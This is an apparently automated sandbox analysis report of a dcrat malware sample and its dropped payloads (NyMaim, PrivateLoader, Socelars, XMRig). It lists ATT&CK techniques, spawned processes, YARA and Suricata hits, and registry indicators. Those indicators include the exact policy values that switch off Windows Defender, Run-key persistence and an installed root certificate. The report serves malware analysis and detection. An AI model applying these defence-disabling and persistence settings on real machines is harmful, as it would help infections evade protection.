dcrat | a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exeUtFxxoBeRgcMQipR8oQNPhS7.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	UtFxxoBeRgcMQipR8oQNPhS7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	UtFxxoBeRgcMQipR8oQNPhS7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	UtFxxoBeRgcMQipR8oQNPhS7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	UtFxxoBeRgcMQipR8oQNPhS7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	UtFxxoBeRgcMQipR8oQNPhS7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	UtFxxoBeRgcMQipR8oQNPhS7.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	UtFxxoBeRgcMQipR8oQNPhS7.exe

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe

NyMaim
NyMaim is a malware with various capabilities written in C++ and first seen in 2013.
trojan nymaim
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	116	532	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3124	532	rundll32.exe

Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\handselfdiy_8.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\handselfdiy_8.exe	family_socelars

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/1596-398-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/1596-399-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/1596-400-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig

Downloads MZ/PE file

Executes dropped EXE 59 IoCs

Processes:

hEJWUzdpMzOf5MHzkz5rXZLP.exe2ITJQLFb1fRKK35OCQkaLI8Z.exezHHMLouApJwoLxDCuvVJ1LGE.exenjtxLurSSstAnBp60ScL4OzD.exeUtFxxoBeRgcMQipR8oQNPhS7.exedR67sfejpm98xkNS841XLYG5.exe2ZKn48jDnGI4veQXh7HXPajY.exeg99WJ5VR8TEJFwsXsTkJNJin.exe6vET8y_A8bX42BlhY8UaUxMU.exeHB7WwFP_QCu3QwzuG59xAp0U.exeConhost.exetjoZYFEsViS0L_WZpyXQAzmU.exen1qMhVvLc1ozD0wTDraEdadw.exeInstall.exeInstall.exeoE3SzOZclk1Z_QOY7l6mFPQU.exeTrdngAnlzr2249.exeliyong.exeexplorer.exeApplication373.exeConhost.exeinst002.exesearch_hyperfs_216.exeRoutes Installation.exeanytime6.exeanytime7.exelogger2.exe0F7DJ.exeConhost.exe4HFIB.execonhost.exeChrome3.exeChrome3.exeChrome3.exelogger2.exelogger2.exeHIJB7.exeD399M1F691226D6.exehfwjjfgRoutes.exeRoutes.exeRoutes.exeRoutes.exeRoutes.exeRoutes.exeRoutes.exeRoutes.exeNostra.exe.pifupdater.exeservices64.exeservices64.exeservices64.exeD9D20IFKDJGI77J.exeRoutes.exegpscript.exeRoutes.exeRoutes.exe

pid	process
4328	hEJWUzdpMzOf5MHzkz5rXZLP.exe
4596	2ITJQLFb1fRKK35OCQkaLI8Z.exe
656	zHHMLouApJwoLxDCuvVJ1LGE.exe
2960	njtxLurSSstAnBp60ScL4OzD.exe
2204	UtFxxoBeRgcMQipR8oQNPhS7.exe
2912	dR67sfejpm98xkNS841XLYG5.exe
4580	2ZKn48jDnGI4veQXh7HXPajY.exe
4804	g99WJ5VR8TEJFwsXsTkJNJin.exe
1012	6vET8y_A8bX42BlhY8UaUxMU.exe
2348	HB7WwFP_QCu3QwzuG59xAp0U.exe
1140	Conhost.exe
1600	tjoZYFEsViS0L_WZpyXQAzmU.exe
3180	n1qMhVvLc1ozD0wTDraEdadw.exe
3708	Install.exe
1988	Install.exe
2984	oE3SzOZclk1Z_QOY7l6mFPQU.exe
328	TrdngAnlzr2249.exe
3632	liyong.exe
4072	explorer.exe
5036	Application373.exe
412	Conhost.exe
2592	inst002.exe
4576	search_hyperfs_216.exe
3520	Routes Installation.exe
1608	anytime6.exe
2544	anytime7.exe
2472	logger2.exe
3416	0F7DJ.exe
4988	Conhost.exe
3916	4HFIB.exe
2908	conhost.exe
4184	Chrome3.exe
2020	Chrome3.exe
4276	Chrome3.exe
1932	logger2.exe
1864	logger2.exe
5036	Application373.exe
3136	HIJB7.exe
3416	0F7DJ.exe
4124	D399M1F691226D6.exe
4136	hfwjjfg
3764	Routes.exe
4188	Routes.exe
2904	Routes.exe
4792	Routes.exe
3920	Routes.exe
1948	Routes.exe
4748	Routes.exe
4336	Routes.exe
896	Nostra.exe.pif
3384	updater.exe
2568	services64.exe
2372	services64.exe
1960	services64.exe
2496	D9D20IFKDJGI77J.exe
4888	Routes.exe
3508	gpscript.exe
4372	Routes.exe
3684	Routes.exe

Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

776 takeown.exe
4308 icacls.exe
1340 takeown.exe
5032 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
776	takeown.exe
4308	icacls.exe
1340	takeown.exe
5032	icacls.exe

VMProtect packed file 6 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\6vET8y_A8bX42BlhY8UaUxMU.exe	vmprotect
behavioral2/memory/1012-189-0x0000000140000000-0x0000000140678000-memory.dmp	vmprotect
C:\Users\Admin\Pictures\Adobe Films\6vET8y_A8bX42BlhY8UaUxMU.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\rtst1077.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\rtst1077.exe	vmprotect
behavioral2/memory/5036-236-0x0000000140000000-0x0000000140676000-memory.dmp	vmprotect

Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 15 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

liyong.exeanytime6.exe2ZKn48jDnGI4veQXh7HXPajY.exesearch_hyperfs_216.exeanytime7.exeUtFxxoBeRgcMQipR8oQNPhS7.exeInstall.exelogger2.exeRoutes.exeRoutes.exea89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe2ITJQLFb1fRKK35OCQkaLI8Z.exeRoutes.exeoE3SzOZclk1Z_QOY7l6mFPQU.exe0F7DJ.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	liyong.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	anytime6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	2ZKn48jDnGI4veQXh7HXPajY.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	search_hyperfs_216.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	anytime7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	UtFxxoBeRgcMQipR8oQNPhS7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	logger2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	Routes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	Routes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	a89d739e39a746fa53b4ace09ccc5ed7a4cd8bd522034aa953ec2892d374124d.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	2ITJQLFb1fRKK35OCQkaLI8Z.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	Routes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	oE3SzOZclk1Z_QOY7l6mFPQU.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	0F7DJ.exe

Loads dropped DLL 57 IoCs

Processes:

njtxLurSSstAnBp60ScL4OzD.exereg.exeRoutes Installation.exemsiexec.exerundll32.exeApplication373.exemsiexec.exeRoutes.exeRoutes.exeRoutes.exeRoutes.exeRoutes.exeRoutes.exeRoutes.exeRoutes.exeRoutes.exegpscript.exeRoutes.exeRoutes.exe

pid	process
2960	njtxLurSSstAnBp60ScL4OzD.exe
4596	reg.exe
3520	Routes Installation.exe
3520	Routes Installation.exe
3520	Routes Installation.exe
3520	Routes Installation.exe
3520	Routes Installation.exe
3320	msiexec.exe
3320	msiexec.exe
2820	rundll32.exe
5036	Application373.exe
5036	Application373.exe
4392	msiexec.exe
4392	msiexec.exe
5036	Application373.exe
5036	Application373.exe
3764	Routes.exe
5036	Application373.exe
3764	Routes.exe
3764	Routes.exe
5036	Application373.exe
3520	Routes Installation.exe
4188	Routes.exe
2904	Routes.exe
4792	Routes.exe
3920	Routes.exe
1948	Routes.exe
4792	Routes.exe
3920	Routes.exe
4792	Routes.exe
3920	Routes.exe
1948	Routes.exe
1948	Routes.exe
4792	Routes.exe
4792	Routes.exe
4748	Routes.exe
4748	Routes.exe
4748	Routes.exe
4336	Routes.exe
4748	Routes.exe
4336	Routes.exe
4336	Routes.exe
4336	Routes.exe
4888	Routes.exe
4888	Routes.exe
4888	Routes.exe
4888	Routes.exe
4888	Routes.exe
3508	gpscript.exe
3508	gpscript.exe
3508	gpscript.exe
4372	Routes.exe
4372	Routes.exe
4372	Routes.exe
3684	Routes.exe
3684	Routes.exe
3684	Routes.exe

Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1340 takeown.exe
5032 icacls.exe
776 takeown.exe
4308 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1340	takeown.exe
5032	icacls.exe
776	takeown.exe
4308	icacls.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

g99WJ5VR8TEJFwsXsTkJNJin.exeApplication373.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	g99WJ5VR8TEJFwsXsTkJNJin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	g99WJ5VR8TEJFwsXsTkJNJin.exe
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Windows\CurrentVersion\Run	Application373.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Routes = "C:\\Users\\Admin\\AppData\\Roaming\\Routes\\Routes.exe --uOyLnaD1"	Application373.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

101 ip-api.com
127 ip-api.com
20 ipinfo.io
21 ipinfo.io
33 ipinfo.io
34 ipinfo.io
51 ipinfo.io
Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 1932 set thread context of 1596 1932 conhost.exe explorer.exe

flow	ioc
101	ip-api.com
127	ip-api.com
20	ipinfo.io
21	ipinfo.io
33	ipinfo.io
34	ipinfo.io
51	ipinfo.io

description	pid	process	target process
PID 1932 set thread context of 1596	1932	conhost.exe	explorer.exe

Drops file in Program Files directory 14 IoCs

Processes:

explorer.exepowershell.exe2ITJQLFb1fRKK35OCQkaLI8Z.exe

description	ioc	process
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\content.js	explorer.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\manifest.json	explorer.exe
File opened for modification	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\background.js	explorer.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\icon.png	explorer.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\background.js	explorer.exe
File created	C:\Program Files\Google\Chrome\updater.exe	powershell.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	powershell.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\aes.js	explorer.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\jquery-3.3.1.min.js	explorer.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\mode-ecb.js	explorer.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\pad-nopadding.js	explorer.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	2ITJQLFb1fRKK35OCQkaLI8Z.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	2ITJQLFb1fRKK35OCQkaLI8Z.exe
File created	C:\Program Files\aieoplapobidheellikiicjfpamacpfd\background.html	explorer.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\bcyLPxSbowNIYSAEXo.job schtasks.exe
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

2168 sc.exe
3124 sc.exe
1036 sc.exe
3124 sc.exe
988 sc.exe
1812 sc.exe
3092 sc.exe
2580 sc.exe
3956 sc.exe
4736 sc.exe
684 sc.exe
4240 sc.exe
2996 sc.exe
3468 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Tasks\bcyLPxSbowNIYSAEXo.job	schtasks.exe

pid	process
2168	sc.exe
3124	sc.exe
1036	sc.exe
3124	sc.exe
988	sc.exe
1812	sc.exe
3092	sc.exe
2580	sc.exe
3956	sc.exe
4736	sc.exe
684	sc.exe
4240	sc.exe
2996	sc.exe
3468	sc.exe

Program crash 21 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1068	2960	WerFault.exe	njtxLurSSstAnBp60ScL4OzD.exe
4996	4580	WerFault.exe	2ZKn48jDnGI4veQXh7HXPajY.exe
4048	1012	WerFault.exe	6vET8y_A8bX42BlhY8UaUxMU.exe
3656	4580	WerFault.exe	2ZKn48jDnGI4veQXh7HXPajY.exe
4452	4580	WerFault.exe	2ZKn48jDnGI4veQXh7HXPajY.exe
3696	4596	WerFault.exe	rundll32.exe
4836	4580	WerFault.exe	2ZKn48jDnGI4veQXh7HXPajY.exe
1644	4580	WerFault.exe	2ZKn48jDnGI4veQXh7HXPajY.exe
5032	5036	WerFault.exe	rtst1077.exe
4548	4580	WerFault.exe	2ZKn48jDnGI4veQXh7HXPajY.exe
4604	2820	WerFault.exe	rundll32.exe
3464	2908	WerFault.exe	LzmwAqmV.exe
2416	4580	WerFault.exe	2ZKn48jDnGI4veQXh7HXPajY.exe
3840	1864	WerFault.exe	logger2.exe
4856	1932	WerFault.exe	logger2.exe
1692	4580	WerFault.exe	2ZKn48jDnGI4veQXh7HXPajY.exe
2156	4580	WerFault.exe	2ZKn48jDnGI4veQXh7HXPajY.exe
1632	328	WerFault.exe	TrdngAnlzr2249.exe
1488	328	WerFault.exe	TrdngAnlzr2249.exe
2500	328	WerFault.exe	TrdngAnlzr2249.exe
4284	328	WerFault.exe	TrdngAnlzr2249.exe

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

hfwjjfgzHHMLouApJwoLxDCuvVJ1LGE.exetjoZYFEsViS0L_WZpyXQAzmU.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	hfwjjfg
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	hfwjjfg
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	hfwjjfg
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	zHHMLouApJwoLxDCuvVJ1LGE.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	zHHMLouApJwoLxDCuvVJ1LGE.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tjoZYFEsViS0L_WZpyXQAzmU.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	zHHMLouApJwoLxDCuvVJ1LGE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tjoZYFEsViS0L_WZpyXQAzmU.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	tjoZYFEsViS0L_WZpyXQAzmU.exe

Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2068 schtasks.exe
2284 schtasks.exe
2256 schtasks.exe
4120 schtasks.exe
1512 schtasks.exe
3300 schtasks.exe
1496 schtasks.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

1140 tasklist.exe

pid	process
2068	schtasks.exe
2284	schtasks.exe
2256	schtasks.exe
4120	schtasks.exe
1512	schtasks.exe
3300	schtasks.exe
1496	schtasks.exe

pid	process
1140	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

4168 taskkill.exe
4800 taskkill.exe

pid	process
4168	taskkill.exe
4800	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

Processes:

D399M1F691226D6.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Internet Explorer\IESettingSync	D399M1F691226D6.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	D399M1F691226D6.exe
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	D399M1F691226D6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	D399M1F691226D6.exe

Modifies registry class 5 IoCs

Processes:

Routes.exeRoutes.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1809750270-3141839489-3074374771-1000\{895B2CFD-2200-4B19-8A62-DC8153DFDB16}	Routes.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1809750270-3141839489-3074374771-1000\{9F9ED7A0-F57E-4688-B2BC-BEC801F92314}	Routes.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
3960	reg.exe
3552	reg.exe
3660	reg.exe
3468	reg.exe
1948	reg.exe
1096	reg.exe
648	reg.exe
2944	reg.exe
272	reg.exe
784	reg.exe
2304	reg.exe
2904	reg.exe
216	reg.exe
636	reg.exe
5112	reg.exe
1140	reg.exe
848	reg.exe
4428	reg.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

Routes.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 5c0000000100000004000000000800000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26040000000100000010000000324a4bbbc863699bbe749ac6dd1d46242000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79fa